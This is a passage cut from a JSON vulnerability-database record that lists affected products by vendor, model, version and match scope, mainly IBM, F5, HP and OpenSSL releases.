"vendor": "ibm", "version": "8.3" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.15.1" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.15.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.210" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "system networking san24b-5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.0.0" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.14" }, { "model": "i operating systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "security network controller 1.0.3381m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "7" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.9.0" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "tivoli netcool system service monitor fp14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "algo one mag", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.8" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.9" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "tssc/imc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9.790" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "big-ip aam", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.6.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "big-ip asm hf9", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.1.730" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "enterprise manager ops center", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "12.2.1" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.2" }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "linerate", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "2.4" }, { "model": "big-ip analytics hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-iq adc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.5" }, { "model": "screenos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "bladecenter t advanced management module 32r0835", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.801" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.5" }, { "model": "big-ip gtm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "system storage san768b-2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system storage san06b-r", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "pureapplication system", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.1" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.11" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.80" }, { "model": "big-ip link controller hf9", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip gtm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "encryption switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "initiate master data service provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "big-ip aam hf5", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip link controller 11.1.0-hf3", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "2.0.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.5" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "big-ip link controller hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "aspera proxy", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "1.2.3" }, { "model": "big-ip asm hf5", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.03" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4.143" }, { "model": "cognos controller fp1 if1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "version control repository manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.8.1.0" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip aam", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "big-ip afm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.4" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8730" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1.0" }, { "model": "cloudbridge", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.7" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.6" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "abyp-0t-0s-4l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3.132" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "initiate master data service patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "big-ip edge gateway 11.0.0-hf1", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.14" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.14" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip asm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "big-ip afm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.6.1" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.13" }, { "model": "abyp-2t-2s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.1" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7989" }, { "model": "abyp-4tl-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.3" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3381" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.1.104" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip pem", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "12.1.0" }, { "model": "nsm", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8740" }, { "model": "abyp-4ts-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0.860" }, { "model": "icewall mcrp sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "big-ip apm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "qlogic 8gb intelligent pass-thru module \u0026 san switch module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.10.1.35.00" }, { "model": "infosphere guardium database activity monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "project openssl 1.0.0p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.12" }, { "model": "big-ip asm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.6.1" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.09" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "2.3" }, { "model": "big-ip psm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "pulse secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "system storage san24b-4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "aspera faspex", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.7.7" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm hf15", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "abyp-10g-2sr-2lr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.146" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.14" }, { "model": "systems insight manager sp6", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1.73" }, { "model": "big-ip gtm hf5", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip analytics", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.6.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "big-ip link controller 11.1.0-hf2", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "big-ip analytics", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "12.1.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.0.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.1.3" }, { "model": "project openssl 0.9.8zc", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.13" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5" }, { "model": "icewall sso agent option update rele", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.02007" }, { "model": "system storage san40b-4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "system networking san96b-5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.25" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1.1" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0" }, { "model": "big-ip webaccelerator hf15", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.34" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1841" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3376" }, { "model": "endeca server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7.4" }, { "model": "messagesight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.010" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "messagesight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "abyp-4t-0s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "flex system fc5022 16gb san scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.3.1" }, { "model": "project openssl 0.9.8zd", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.23" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.10.4" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.11" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "icewall sso dfw r3", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.179" }, { "model": "project openssl 1.0.1k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.010" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.40" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.9" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "junos os", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.15" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1886" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0.1" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip ltm hf9", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.2" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.2.0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "version control agent", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.3.5" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "system storage san384b-2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3.0.5" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.7" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "big-ip asm hf15", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.212" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.4" }, { "model": "big-ip asm hf2", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "big-ip gtm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.01" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "big-ip wom hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 